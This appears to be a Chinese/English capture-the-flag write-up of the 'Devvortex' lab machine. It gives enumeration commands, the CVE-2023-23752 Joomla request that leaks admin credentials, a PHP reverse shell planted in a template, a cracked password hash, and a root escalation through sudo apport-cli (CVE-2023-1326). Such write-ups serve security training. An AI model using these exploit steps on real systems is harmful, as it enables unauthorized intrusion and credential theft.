本文介绍了一个针对名为"Devvortex"的Linux系统的渗透测试过程。通过Nmap扫描发现开放的SSH和HTTP端口,随后使用FFUF工具进行子域名和目录的发现。找到Joomla管理登录页面后,利用CVE-2023-23752漏洞获取管理员凭据。进一步通过添加PHP反向shell获取MySQL数据库凭据,破解用户hash获取特权用户的凭据。最后,通过使用sudo执行apport-cli工具并利用CVE-2023-1326漏洞获得root权限。本文总结了渗透测试的关键步骤和利用的漏洞。 This article details the penetration testing process conducted on a Linux system named "Devvortex". An Nmap scan revealed open SSH and HTTP ports, followed by the use of the FFUF tool for subdomain and directory discovery. After locating the Joomla admin login page, the CVE-2023-23752 vulnerability was exploited to obtain administrator credentials. Further steps involved adding a PHP reverse shell to retrieve MySQL database credentials, cracking user hashes to obtain privileged user credentials, and finally achieving root privileges by using sudo to execute the apport-cli tool and exploiting the CVE-2023-1326 vulnerability. The article summarizes the key steps and vulnerabilities leveraged during the penetration test.

Information Gathering

# Nmap 7.98 scan initiated Sat Dec 27 09:08:15 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 15.115 days (since Fri Dec 12 06:22:47 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 09:08:31 2025 -- 1 IP address (1 host up) scanned in 15.48 seconds

Vulnerability Analysis

由于页面都是静态的所以寻找虚拟机

➜  Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]

打开dev.devvortex.htb,发现也是静态,寻找一下子目录

➜  Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images                  [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home                    [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components              [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator           [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]

http://dev.devvortex.htb/administrator/得到Joomla Administrator Login,查找到一个漏洞CVE-2023-23752

在GitHub中找到Version目录https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml

http://dev.devvortex.htb/administrator/manifests/files/joomla.xml得到4.2.6可以使用CVE-2023-23752

Exploitation (User Flag)

➜  Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jq

得到凭据lewis:P4ntherg0t1n5r3c0n##

我们在System > Site Templates > Cassiopeia Details and Files > error.php添加php反向shell

ss -tlpn->3306,33060得知mysql

www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
				public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'lewis';
        public $password = 'P4ntherg0t1n5r3c0n##';

mysql -u lewis -p登录数据库

枚举数据库得到

| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

破解hash值得到凭据logan:tequieromucho

Privilege Escalation (Root Flag)

logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11

搜索得到CVE-2023-1326

logan@devvortex:~$ sudo /usr/bin/apport-cli -f
# 输入2
# 输入1或随机
# 输入V
# 输入!/bin/bash
即可得到root

Lessons Learned

Information Gathering

# Nmap 7.98 scan initiated Sat Dec 27 09:08:15 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 15.115 days (since Fri Dec 12 06:22:47 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 09:08:31 2025 -- 1 IP address (1 host up) scanned in 15.48 seconds

Vulnerability Analysis

Since the pages are all static, looking for the virtual machine

➜  Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]

Opening dev.devvortex.htb, found it's also static, looking for subdirectories

➜  Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images                  [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home                    [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language                [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components              [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache                   [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries               [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp                     [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator           [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]

http://dev.devvortex.htb/administrator/ obtained Joomla Administrator Login, found a vulnerability CVE-2023-23752

Found the Version directory on GitHub https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml

http://dev.devvortex.htb/administrator/manifests/files/joomla.xml shows version 4.2.6, which can be used with CVE-2023-23752

Exploitation (User Flag)

➜  Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jq

Obtained credentials lewis:P4ntherg0t1n5r3c0n##

We added a PHP reverse shell in System > Site Templates > Cassiopeia Details and Files > error.php

ss -tlpn -> 3306, 33060 indicates MySQL

www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
				public $dbtype = 'mysqli';
        public $host = 'localhost';
        public $user = 'lewis';
        public $password = 'P4ntherg0t1n5r3c0n##';

mysql -u lewis -p to log into the database

Enumerated the database and obtained

| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

Cracked the hash to obtain credentials logan:tequieromucho

Privilege Escalation (Root Flag)

logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11

Searched and found CVE-2023-1326

logan@devvortex:~$ sudo /usr/bin/apport-cli -f
# Input 2
# Input 1 or random
# Input V
# Input !/bin/bash
Then root is obtained

Lessons Learned